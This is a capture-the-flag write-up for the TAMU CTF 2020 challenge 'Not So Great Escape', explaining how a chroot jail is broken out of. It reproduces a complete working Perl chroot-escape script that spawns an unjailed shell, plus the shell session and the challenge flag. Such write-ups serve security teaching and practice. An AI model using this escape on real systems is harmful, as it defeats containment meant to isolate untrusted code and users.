Not So Great Escape [Misc]
TAMU CTF 2020

Not So Great Escape

We've set up a chroot for you to develop your musl code in. It's bare, so install whatever you need. The password is ... Feel free to log in with: socat -,raw,echo=0 tcp:challenges.tamuctf.com:4353

Recon

Looks like it's an alpine linux chroot, meaning apk is the package installer of choice. We did some quick searching and found these slides on breaking chroot. Searched for a quick script for one of the basic methods and found this (also see code)

The basic idea behind the method is to first create a new file and maintain a file handle for that file, while creating a new chroot that doesn't contain a path to the file. Then, we will try to access that file handle from within the new chroot (that doesn't know how to represent a path to this file!).

Apparently chroot is implemented in such a way that it will use the path from original root, so then we can simply cd upwards from there until we hit the original root, and then chroot into that.

Code

#!/usr/bin/perl -w
use strict;
# unchroot.pl Dec 2007
# http://pentestmonkey.net/blog/chroot-breakout-perl

# This script may be used for legal purposes only.

# Go to the root of the jail
chdir "/";

# Open filehandle to root of jail
opendir JAILROOT, "." or die "ERROR: Couldn't get file handle to root of jailn";

# Create a subdir, move into it
mkdir "mysubdir";
chdir "mysubdir";

# Lock ourselves in a new jail
chroot ".";

# Use our filehandle to get back to the root of the old jail
chdir(*JAILROOT);

# Get to the real root
while ((stat("."))[0] != (stat(".."))[0] or (stat("."))[1] != (stat(".."))[1]) {
        chdir "..";
}

# Lock ourselves in real root - so we're not really in a jail at all now
chroot ".";

# Start an un-jailed shell
system("/bin/sh");

Now, before we can run it, we need to make sure the box has perl installed: apk add perl. Then we simply run it and we're in the original root:

/ # ls
bin    etc    lib    mnt    proc   root   sbin   sys    usr
dev    home   media  opt    pwn    run    srv    tmp    var
/ # ls pwn
flag.txt             jail                 not-so-great-escape
/ # cat pwn/flag.txt 
gigem{up_up_&_a_way_0u7}

Flag

gigem{up_up_&_a_way_0u7}